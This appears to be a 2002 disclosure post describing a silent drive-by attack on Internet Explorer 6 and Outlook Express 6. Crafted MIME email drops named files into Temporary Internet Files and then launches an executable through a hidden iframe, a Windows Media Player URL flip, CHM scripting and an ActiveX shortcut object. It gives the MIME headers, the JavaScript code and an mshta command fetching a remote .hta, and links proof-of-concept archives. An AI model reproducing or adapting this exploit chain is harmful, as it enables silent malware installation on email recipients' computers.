Thursday, 28 March, 2002 Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site. This can be accomplished with the default installation of Internet Explorer 6.0, Outlook Express 6.0 and probably Outlook and Outlook 2002 and whatever other Outlook's there are. Default settings for Outlook Express and Outlook: restricted zone. This is by no means trivial. The Key: Internet explorer and accompanying mail and news clients divert all external files into the Temporary Internet File (TIF) which is controlled by the various security settings of the browser. If we can strategically place our named files inside the TIF and determine their exact location, we are in business. How Do We Do That: Recent bandages applied to Internet Explorer currently transfer files from mail and news to the TIF without given names and with a TMP extension. Technically the mail client is able to determine the contents of these *.TMP files through the Content-ID protocol (cid:malware) whether the file is a sound file, html file, image file etc. and based on the contents coupled with the given Content-Type: image/gif render or parse accordingly. Through trivial html we are able to restore our given file names and dictate where our files are to be placed inside the TIF. Content-Type: audio/x-ms-wma; name="malware.wma" Content-Transfer-Encoding: base64 Content-ID: <mrs.malware> Content-Location: file:///malware.wma In order to ensure all our files end up in the same folder within the TIF, we encapsulate the entire "package" in MIME base64 so that as the self-contained mail message is opened within a particular folder in the TIF, so all the required files are transferred instantly and silently into that same particular folder. [screen shot: http://www.malware.com/ca$h.png 11KB] And: Now that we have our named files in our known location inside the TIF, we need to access them to trigger off the entire event. We utilise the multi-purpose Windows Media Player and its assortment of files. We create a very simple media file with 0s URL flip and point that to our named file in our known location. <iframe src="cid:mrs.malware"; style="display:none"> Content-Type: audio/x-ms-wma; name="malware.wma" Content-Transfer-Encoding: base64 Content-ID: <mrs.malware> Content-Location: file:///malware.wma Our named file it points to is a very simple *.html file comprising our scripting to determine the location like so: malware=document.URL; path=malware.substr(-0,malware.lastIndexOf("\\")); path=unescape(path); With this information, we utilise an existing possibility to call our named *.chm file which has been delivered to the TIF along with our primary message and open it. Inside our *.chm we include a more sophisticated scripting to determine yet again the location of our third file, our *.exe which has also been delivered along with our primary message: var malware="malware[1].exe"; document.writeln('<OBJECT id=AA classid="clsid:adb880a6-d8ff-11cf- 9377-00aa003b7a11" width=10 height=10>'); document.writeln('<PARAM name="Command" value="ShortCut">'); document.writeln(' <PARAM name="Item1" value=",'+cool.path+malware+',">'); document.writeln('</OBJECT>'); setTimeout("AA.Click();",3000); [screen shot: http://www.malware.com/ca$h.png 11KB] This inturn fires our *.exe that we have dropped into the TIF. Critical Note: it is imperative that our media file is delivered to the TIF and opened from within the TIF through MIME encapsulation. Without out this the URL filp when triggered will expect to find the referenced file name on the server. Repeat: 1. Our mail message or news post containing our 4 critical files [*.html, *.chm, *.wma, *.exe] is fired off to the unsuspecting recipient. 2. Upon opening the mail or news message, all embedded files are instantly transferred to the TIF with our given file names. Note: this is in addition to the exact same files transferred in accordance with security as *.TMP files. Our 0s media file is then automatically opened by our iframe. This inturn launches the Windows Media Player which immediately URL flips to our named *.html file. Obviously, because the media file resides in the same folder inside the TIF as our *.html file, it will call the *.html file. 3. Our *.html file is then opened in a new browser window along with the full path name of its location. Our scripting to determine the location and write it inside our *.html is fired. This inturn calls our *.chm file which is opened. 4. Our *.chm file is opened and our sophisticated scripting to determine the location inside that, then calls our *.exe which also resides in the same folder inside the TIF: [screen shot: http://www.malware.com/ca$h.png 11KB] BANG! The above represents by far the most successful method to achieve this. Primarily because we can (a) dictate our file names and (b) ensure all necessary files are transferred to the same folder within the TIF. In the case of Outlook Express default settings and Outlook default settings, where no scripting and no activex is allowed. We can achieve similar results substituting our method of file transference in the above, with a less than robust method. Simply put: a) embedded media file in iframe -- automatically opened from with in the TIF -- no scripting b) generic html tags <img src=malware.html...<bgsound src=*.chm...etc will deposit our required files inside the TIF-- no scripting but not always in the same folder. To do this we need to draw the files remotely from a server in order to ensure they are transferred with given file names. 5 out of 10 times we can achieve success but in typical fashion the Internet Explorer 6 browser under unidentifiable conditions (at whim), can transfer each file into different folders inside the TIF. In the case of Internet Explorer 6 simply converting our mail or news message to *.mhtml format and in particular our first scenario above where all files are embedded, results in 99.999% success. Obviously that 1% being the most important, and that is launching the Windows Media Player in order to invoke our URL flip. No matter how examined, despite all necessary files with file names being in the known location, it simply refuses interpret the path to the media file.Without a doubt a solution is out there but we are out of time. Working Examples: Tested on fully patched Internet Explorer 6 and Outlook Express 6 on win98 NOTE: all have about a 20 second delay 1. All files fully embedded in the mail message. Open in mail client in internet zone: Includes harmless *.exe http://www.malware.com/oxpress.zip note: there can be a possibility that the resulting file name after transference differs from OS to OS. 2. Media file fully embedded, all other files remotely retrieved. Open in mail client in restricted zone. Includes harmless *.exe http://www.malware.com/outlook.zip note 1: there is a great possibility that the resulting transference is to different folders within the TIF. note 2: this is definitely not fool proof but by decreasing the amount of required files i.e. only *.chm and *.html with incorporation of the previous: C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta link we can leave out the *.exe as it would appear that the more files transferred the more chances are different folders inside the TIF are used. 3. For Internet Explorer 6, simply convert 1 above to *.mhtml format and give it a whack. Perhaps some bright spark knows how to remedy this one. Good Luck ! 4. For the very few interested, we managed to compile an *.hta file into a *.chm as well as a RFC822 mail message. Behaviour results in the same as IE6. Nothing spectacular. Technically interesting results: http://www.malware.com/chm.zip End Call -- http://www.malware.com
